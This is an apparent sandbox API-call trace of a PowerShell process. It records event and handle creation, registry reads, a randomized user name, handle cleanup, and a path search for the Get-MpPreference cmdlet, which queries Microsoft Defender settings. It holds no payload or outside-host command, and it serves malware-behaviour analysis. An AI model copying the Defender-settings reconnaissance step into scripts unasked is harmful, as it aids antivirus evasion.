0x398 [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3d4 [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0 [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e4 [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ec [0053.807] GetLastError () returned 0x0 [0053.808] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0053.808] GetLastError () returned 0x0 [0053.808] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0053.808] GetLastError () returned 0x0 [0053.808] SetEvent (hEvent=0x398) returned 1 [0053.808] GetLastError () returned 0x0 [0053.808] SetEvent (hEvent=0x38c) returned 1 [0053.808] GetLastError () returned 0x0 [0053.808] SetEvent (hEvent=0x390) returned 1 [0053.808] GetLastError () returned 0x0 [0053.808] SetEvent (hEvent=0x394) returned 1 [0053.808] GetLastError () returned 0x0 [0053.808] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8 [0053.808] GetLastError () returned 0x0 [0053.808] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e764 | out: phkResult=0x19e764*=0x3fc) returned 0x0 [0053.808] RegQueryValueExW (in: hKey=0x3fc, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x19e7ac, lpData=0x0, lpcbData=0x19e7a8*=0x0 | out: lpType=0x19e7ac*=0x0, lpData=0x0, lpcbData=0x19e7a8*=0x0) returned 0x2 [0053.850] SetEvent (hEvent=0x39c) returned 1 [0053.850] GetLastError () returned 0x0 [0053.851] SetEvent (hEvent=0x3d4) returned 1 [0053.851] GetLastError () returned 0x0 [0053.851] SetEvent (hEvent=0x3c0) returned 1 [0053.851] GetLastError () returned 0x0 [0053.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.876] GetLastError () returned 0xcb [0053.883] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e840 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e840) returned 0x1 [0053.883] GetLastError () returned 0xcb [0053.884] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e848 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e848) returned 1 [0053.884] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3174224*="Stopped", lpRawData=0x31740e0) returned 1 [0053.885] GetLastError () returned 0x0 [0053.885] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0053.885] GetLastError () returned 0x0 [0053.887] CoGetContextToken (in: pToken=0x19f570 | out: pToken=0x19f570) returned 0x0 [0053.887] CObjectContext::QueryInterface () returned 0x0 [0053.887] CObjectContext::GetCurrentThreadType () returned 0x0 [0053.888] Release () returned 0x0 [0053.889] CoGetContextToken (in: pToken=0x19f348 | out: pToken=0x19f348) returned 0x0 [0053.889] CObjectContext::QueryInterface () returned 0x0 [0053.889] CObjectContext::GetCurrentThreadType () returned 0x0 [0053.889] Release () returned 0x0 [0053.892] CoGetContextToken (in: pToken=0x19f348 | out: pToken=0x19f348) returned 0x0 [0053.892] CObjectContext::QueryInterface () returned 0x0 [0053.892] CObjectContext::GetCurrentThreadType () returned 0x0 [0053.892] Release () returned 0x0 [0053.901] CoGetContextToken (in: pToken=0x19f348 | out: pToken=0x19f348) returned 0x0 [0053.901] CObjectContext::QueryInterface () returned 0x0 [0053.902] CObjectContext::GetCurrentThreadType () returned 0x0 [0053.902] Release () returned 0x0 [0053.936] CoGetContextToken (in: pToken=0x19f328 | out: pToken=0x19f328) returned 0x0 [0053.936] CObjectContext::QueryInterface () returned 0x0 [0053.936] CObjectContext::GetCurrentThreadType () returned 0x0 [0053.936] Release () returned 0x0 [0053.937] CoUninitialize () Thread: id = 78 os_tid = 0x490 Thread: id = 79 os_tid = 0x6dc Thread: id = 80 os_tid = 0x734 Thread: id = 81 os_tid = 0x124 Thread: id = 82 os_tid = 0x32c [0045.587] CoGetContextToken (in: pToken=0x4b5f818 | out: pToken=0x4b5f818) returned 0x0 [0045.587] CObjectContext::QueryInterface () returned 0x0 [0045.587] CObjectContext::GetCurrentThreadType () returned 0x0 [0045.587] Release () returned 0x0 [0045.587] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0049.823] LocalFree (hMem=0x233370) returned 0x0 [0049.823] GetLastError () returned 0x0 [0049.823] CloseHandle (hObject=0x34c) returned 1 [0049.824] GetLastError () returned 0x0 [0049.824] CloseHandle (hObject=0x13) returned 1 [0049.824] GetLastError () returned 0x0 [0049.824] CloseHandle (hObject=0xf) returned 1 [0049.824] GetLastError () returned 0x0 [0049.825] RegCloseKey (hKey=0x330) returned 0x0 [0049.825] RegCloseKey (hKey=0x32c) returned 0x0 [0049.825] RegCloseKey (hKey=0x328) returned 0x0 [0049.825] LocalFree (hMem=0x233390) returned 0x0 [0049.825] GetLastError () returned 0x0 [0049.825] RegCloseKey (hKey=0x358) returned 0x0 [0051.011] RegCloseKey (hKey=0x3d4) returned 0x0 [0051.012] RegCloseKey (hKey=0x39c) returned 0x0 [0051.012] RegCloseKey (hKey=0x398) returned 0x0 [0051.012] RegCloseKey (hKey=0x394) returned 0x0 [0051.012] RegCloseKey (hKey=0x390) returned 0x0 [0051.012] RegCloseKey (hKey=0x38c) returned 0x0 [0051.013] RegCloseKey (hKey=0x388) returned 0x0 [0051.013] RegCloseKey (hKey=0x384) returned 0x0 [0051.013] RegCloseKey (hKey=0x380) returned 0x0 [0051.013] RegCloseKey (hKey=0x3d0) returned 0x0 [0051.013] RegCloseKey (hKey=0x378) returned 0x0 [0051.013] RegCloseKey (hKey=0x374) returned 0x0 [0051.014] RegCloseKey (hKey=0x370) returned 0x0 [0051.014] RegCloseKey (hKey=0x36c) returned 0x0 [0051.014] RegCloseKey (hKey=0x368) returned 0x0 [0051.014] RegCloseKey (hKey=0x364) returned 0x0 [0051.014] RegCloseKey (hKey=0x35c) returned 0x0 [0051.015] RegCloseKey (hKey=0x34c) returned 0x0 [0051.015] RegCloseKey (hKey=0x3cc) returned 0x0 [0051.015] RegCloseKey (hKey=0x32c) returned 0x0 [0051.015] RegCloseKey (hKey=0x328) returned 0x0 [0051.015] RegCloseKey (hKey=0x3c8) returned 0x0 [0051.015] RegCloseKey (hKey=0x3c4) returned 0x0 [0051.016] RegCloseKey (hKey=0x3a0) returned 0x0 [0051.016] RegCloseKey (hKey=0x3dc) returned 0x0 [0051.016] RegCloseKey (hKey=0x3bc) returned 0x0 [0051.016] RegCloseKey (hKey=0x3b8) returned 0x0 [0051.016] RegCloseKey (hKey=0x3b4) returned 0x0 [0051.017] RegCloseKey (hKey=0x3b0) returned 0x0 [0051.017] RegCloseKey (hKey=0x3ac) returned 0x0 [0051.017] RegCloseKey (hKey=0x3a8) returned 0x0 [0051.017] RegCloseKey (hKey=0x3a4) returned 0x0 [0051.017] RegCloseKey (hKey=0x330) returned 0x0 [0051.017] RegCloseKey (hKey=0x3d8) returned 0x0 [0051.018] RegCloseKey (hKey=0x358) returned 0x0 [0053.891] GetLastError () returned 0x0 [0053.891] GetLastError () returned 0x0 [0053.891] LocalFree (hMem=0x21a700) returned 0x0 [0053.891] GetLastError () returned 0x0 [0053.892] GetLastError () returned 0x0 [0053.892] GetLastError () returned 0x0 [0053.892] LocalFree (hMem=0x21a678) returned 0x0 [0053.892] GetLastError () returned 0x0 [0053.901] DeregisterEventSource (hEventLog=0x4aa0004) returned 1 [0053.902] GetLastError () returned 0x0 [0053.913] CloseHandle (hObject=0x5b) returned 1 [0053.914] GetLastError () returned 0x0 [0053.914] CloseHandle (hObject=0x57) returned 1 [0053.914] GetLastError () returned 0x0 [0053.914] CloseHandle (hObject=0x53) returned 1 [0053.915] GetLastError () returned 0x0 [0053.915] CloseHandle (hObject=0x4f) returned 1 [0053.915] GetLastError () returned 0x0 [0053.915] CloseHandle (hObject=0x4b) returned 1 [0053.915] GetLastError () returned 0x0 [0053.916] CloseHandle (hObject=0x47) returned 1 [0053.916] GetLastError () returned 0x0 [0053.916] CloseHandle (hObject=0x43) returned 1 [0053.916] GetLastError () returned 0x0 [0053.916] CloseHandle (hObject=0x3f) returned 1 [0053.917] GetLastError () returned 0x0 [0053.917] CloseHandle (hObject=0x3b) returned 1 [0053.917] GetLastError () returned 0x0 [0053.917] CloseHandle (hObject=0x37) returned 1 [0053.918] GetLastError () returned 0x0 [0053.918] CloseHandle (hObject=0x33) returned 1 [0053.918] GetLastError () returned 0x0 [0053.918] CloseHandle (hObject=0x2f) returned 1 [0053.918] GetLastError () returned 0x0 [0053.919] CloseHandle (hObject=0x2b) returned 1 [0053.919] GetLastError () returned 0x0 [0053.919] CloseHandle (hObject=0x27) returned 1 [0053.919] GetLastError () returned 0x0 [0053.919] CloseHandle (hObject=0x23) returned 1 [0053.920] GetLastError () returned 0x0 [0053.920] CloseHandle (hObject=0x388) returned 1 [0053.920] GetLastError () returned 0x0 [0053.920] UnmapViewOfFile (lpBaseAddress=0x5280000) returned 1 [0053.921] CloseHandle (hObject=0x1f) returned 1 [0053.921] GetLastError () returned 0x0 [0053.921] CloseHandle (hObject=0x1b) returned 1 [0053.921] GetLastError () returned 0x0 [0053.922] RegCloseKey (hKey=0x34c) returned 0x0 [0053.922] CloseHandle (hObject=0x3cc) returned 1 [0053.922] GetLastError () returned 0x0 [0053.922] CloseHandle (hObject=0x32c) returned 1 [0053.922] GetLastError () returned 0x0 [0053.922] CloseHandle (hObject=0x328) returned 1 [0053.922] GetLastError () returned 0x0 [0053.923] CloseHandle (hObject=0x3c8) returned 1 [0053.923] GetLastError () returned 0x0 [0053.923] CloseHandle (hObject=0x3c4) returned 1 [0053.923] GetLastError () returned 0x0 [0053.923] CloseHandle (hObject=0x3a0) returned 1 [0053.923] GetLastError () returned 0x0 [0053.923] CloseHandle (hObject=0x3dc) returned 1 [0053.923] GetLastError () returned 0x0 [0053.923] CloseHandle (hObject=0x3bc) returned 1 [0053.923] GetLastError () returned 0x0 [0053.924] CloseHandle (hObject=0x3b8) returned 1 [0053.924] GetLastError () returned 0x0 [0053.924] CloseHandle (hObject=0x3b4) returned 1 [0053.924] GetLastError () returned 0x0 [0053.924] CloseHandle (hObject=0x3b0) returned 1 [0053.924] GetLastError () returned 0x0 [0053.924] CloseHandle (hObject=0x3ac) returned 1 [0053.924] GetLastError () returned 0x0 [0053.924] CloseHandle (hObject=0x3a8) returned 1 [0053.924] GetLastError () returned 0x0 [0053.925] CloseHandle (hObject=0x17) returned 1 [0053.925] GetLastError () returned 0x0 [0053.925] CloseHandle (hObject=0x13) returned 1 [0053.925] GetLastError () returned 0x0 [0053.926] RegCloseKey (hKey=0x3fc) returned 0x0 [0053.926] CloseHandle (hObject=0x3f8) returned 1 [0053.926] GetLastError () returned 0x0 [0053.926] CloseHandle (hObject=0x3f4) returned 1 [0053.926] GetLastError () returned 0x0 [0053.926] CloseHandle (hObject=0x3f0) returned 1 [0053.926] GetLastError () returned 0x0 [0053.926] CloseHandle (hObject=0x3ec) returned 1 [0053.927] GetLastError () returned 0x0 [0053.927] CloseHandle (hObject=0x3e8) returned 1 [0053.927] GetLastError () returned 0x0 [0053.927] CloseHandle (hObject=0x3e4) returned 1 [0053.927] GetLastError () returned 0x0 [0053.927] CloseHandle (hObject=0x3c0) returned 1 [0053.927] GetLastError () returned 0x0 [0053.927] CloseHandle (hObject=0x3d4) returned 1 [0053.927] GetLastError () returned 0x0 [0053.928] CloseHandle (hObject=0x39c) returned 1 [0053.928] GetLastError () returned 0x0 [0053.928] CloseHandle (hObject=0x398) returned 1 [0053.928] GetLastError () returned 0x0 [0053.928] CloseHandle (hObject=0x394) returned 1 [0053.928] GetLastError () returned 0x0 [0053.928] CloseHandle (hObject=0x390) returned 1 [0053.928] GetLastError () returned 0x0 [0053.928] CloseHandle (hObject=0x38c) returned 1 [0053.928] GetLastError () returned 0x0 [0053.929] CloseHandle (hObject=0xf) returned 1 [0053.929] GetLastError () returned 0x0 [0053.929] CloseHandle (hObject=0x7f) returned 1 [0053.929] GetLastError () returned 0x0 [0053.929] CloseHandle (hObject=0x7b) returned 1 [0053.930] GetLastError () returned 0x0 [0053.930] CloseHandle (hObject=0x77) returned 1 [0053.930] GetLastError () returned 0x0 [0053.930] CloseHandle (hObject=0x73) returned 1 [0053.931] GetLastError () returned 0x0 [0053.931] CloseHandle (hObject=0x6f) returned 1 [0053.931] GetLastError () returned 0x0 [0053.931] CloseHandle (hObject=0x6b) returned 1 [0053.931] GetLastError () returned 0x0 [0053.932] CloseHandle (hObject=0x344) returned 1 [0053.932] GetLastError () returned 0x0 [0053.932] UnmapViewOfFile (lpBaseAddress=0x2970000) returned 1 [0053.932] CloseHandle (hObject=0x354) returned 1 [0053.932] GetLastError () returned 0x0 [0053.932] RegCloseKey (hKey=0x80000004) returned 0x0 [0053.933] CloseHandle (hObject=0x310) returned 1 [0053.933] GetLastError () returned 0x0 [0053.933] CloseHandle (hObject=0x67) returned 1 [0053.933] GetLastError () returned 0x0 [0053.933] CloseHandle (hObject=0x63) returned 1 [0053.934] GetLastError () returned 0x0 [0053.934] CloseHandle (hObject=0x5f) returned 1 [0053.934] GetLastError () returned 0x0 Thread: id = 83 os_tid = 0x60c [0051.851] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0051.878] SetThreadUILanguage (LangId=0x0) returned 0x409 [0051.887] VirtualQuery (in: lpAddress=0x5c8e140, lpBuffer=0x5c8f140, dwLength=0x1c | out: lpBuffer=0x5c8f140*(BaseAddress=0x5c8e000, AllocationBase=0x5300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.890] GetLastError () returned 0xcb [0051.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.893] GetLastError () returned 0xcb [0051.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.895] GetLastError () returned 0xcb [0051.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.906] GetLastError () returned 0xcb [0051.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.908] GetLastError () returned 0xcb [0051.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.909] GetLastError () returned 0xcb [0051.922] VirtualQuery (in: lpAddress=0x5c8e25c, lpBuffer=0x5c8f25c, dwLength=0x1c | out: lpBuffer=0x5c8f25c*(BaseAddress=0x5c8e000, AllocationBase=0x5300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.922] GetLastError () returned 0xcb [0051.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.924] GetLastError () returned 0xcb [0051.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.924] GetLastError () returned 0xcb [0051.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.933] GetLastError () returned 0xcb [0051.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.951] GetLastError () returned 0xcb [0052.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.006] GetLastError () returned 0xcb [0052.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.007] GetLastError () returned 0xcb [0052.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.008] GetLastError () returned 0xcb [0052.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.010] GetLastError () returned 0xcb [0052.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.011] GetLastError () returned 0xcb [0052.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.012] GetLastError () returned 0xcb [0052.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.013] GetLastError () returned 0xcb [0052.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.034] GetLastError () returned 0xcb [0052.220] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0052.220] GetLastError () returned 0xcb [0052.224] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0052.224] GetLastError () returned 0xcb [0052.234] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x287620 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0052.234] GetLastError () returned 0xcb [0052.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.247] GetLastError () returned 0xcb [0052.248] SetErrorMode (uMode=0x1) returned 0x1 [0052.250] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.ps1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.250] GetLastError () returned 0x2 [0052.250] SetErrorMode (uMode=0x1) returned 0x1 [0052.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.252] GetLastError () returned 0x2 [0052.252] SetErrorMode (uMode=0x1) returned 0x1 [0052.252] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.psm1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.252] GetLastError () returned 0x2 [0052.252] SetErrorMode (uMode=0x1) returned 0x1 [0052.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.252] GetLastError () returned 0x2 [0052.252] SetErrorMode (uMode=0x1) returned 0x1 [0052.252] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.psd1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.253] GetLastError () returned 0x2 [0052.253] SetErrorMode (uMode=0x1) returned 0x1 [0052.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.253] GetLastError () returned 0x2 [0052.253] SetErrorMode (uMode=0x1) returned 0x1 [0052.253] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.COM", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.253] GetLastError () returned 0x2 [0052.253] SetErrorMode (uMode=0x1) returned 0x1 [0052.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.253] GetLastError () returned 0x2 [0052.253] SetErrorMode (uMode=0x1) returned 0x1 [0052.253] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.EXE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.253] GetLastError () returned 0x2 [0052.253] SetErrorMode (uMode=0x1) returned 0x1 [0052.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.254] GetLastError () returned 0x2 [0052.254] SetErrorMode (uMode=0x1) returned 0x1 [0052.254] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.BAT", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.254] GetLastError () returned 0x2 [0052.254] SetErrorMode (uMode=0x1) returned 0x1 [0052.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.254] GetLastError () returned 0x2 [0052.254] SetErrorMode (uMode=0x1) returned 0x1 [0052.254] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.CMD", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.254] GetLastError () returned 0x2 [0052.254] SetErrorMode (uMode=0x1) returned 0x1 [0052.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.254] GetLastError () returned 0x2 [0052.254] SetErrorMode (uMode=0x1) returned 0x1 [0052.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.VBS", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.255] GetLastError () returned 0x2 [0052.255] SetErrorMode (uMode=0x1) returned 0x1 [0052.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.255] GetLastError () returned 0x2 [0052.255] SetErrorMode (uMode=0x1) returned 0x1 [0052.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.VBE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.255] GetLastError () returned 0x2 [0052.255] SetErrorMode (uMode=0x1) returned 0x1 [0052.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.255] GetLastError () returned 0x2 [0052.255] SetErrorMode (uMode=0x1) returned 0x1 [0052.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.JS", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.256] GetLastError () returned 0x2 [0052.256] SetErrorMode (uMode=0x1) returned 0x1 [0052.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 